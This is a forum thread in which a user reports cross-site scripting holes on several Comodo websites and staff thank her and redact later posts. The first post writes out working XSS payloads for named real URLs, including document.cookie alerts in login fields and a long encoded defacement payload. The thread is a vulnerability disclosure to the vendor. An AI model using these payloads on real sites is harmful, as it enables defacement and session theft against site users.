Comodo website vulnerable to XSS [REPORT]

How Can I Help Comodo? (Please We Need You!) Report Comodo Forum / Web Site Issues
#1

Report:

https://support.comodo.com/index.php?_m=core&_a=lostpassword

"><script>alert("XSS")</script>


http://www.comodo.com/hackerproof/order2.html?term="><script>alert("www.Insecurity.Ro")</script>

XSS Deface : (picture, alerts, music, etc…)

http://www.comodo.com/hackerproof/order2.html?term=%22%3E%3C/title%3E%3Cscript%3Ealert(%22XSS%20Comodo%22)%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-color:%20Black;}%3C/style%3E'%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2020px;%22%3E%3Cimg%20src=%22http://img257.imageshack.us/img257/3733/77822687.png%22%20style=%22height:%20400px;%20width:%20600px;%22%20alt=%22By%20Sony%22%3E%3Cbr%3Eby%20Sony%3Ciframe%20src%20=http://www.youtube.com/watch?v=_qwBAZ64VYM%22%20width=%220%22%20height=%220%22%20%5C%3E%3C/div%3E

http://jp.comodo.com/buy/index.php?main_page=discount_coupon&action=lookup

<script>alert(document.cookie)</script>

https://secure.instantssl.com/products/login

username :

"><script>alert(document.cookie)</script>

password:

"><script>alert(document.cookie)</script>

(now don’t work)

The Best Regards!

Lady Sony

#2

Hi Lady Sony,

Thanks for reporting, they will investigate ASAP.

#3

Ok

#4

Hello my boys! :-*

Today I was bored and I found a new xss in comodo.com

… removed by admin …

The Best Regards!

Lady Sony

#5

Thanks for reporting, we’ll investigate the issue.

#6

ok

#7

Hi Lady Sony,

Thank you for your heads up. The xss is being fixed as we speak by the web dev team. I’ve removed the code from your post, so we don’t have any issues.

Multumim :slight_smile:

#8

Ok)

More…

Another xss…

http://www.comodo.com/M<code removed by mod>

You can see and fix it.

So…i found error in mysql (This can be used for full hacking) , but…I lost the link.
If I find, then I’ll write only in the PM.

The Best Regards!

Lady Sony

#9 
http://www.hackerguardian.com/<code removed by mod>

etc…

A lot of xss…

#10

Hi again,

Thanks for reporting, will notify admins again.
Ronny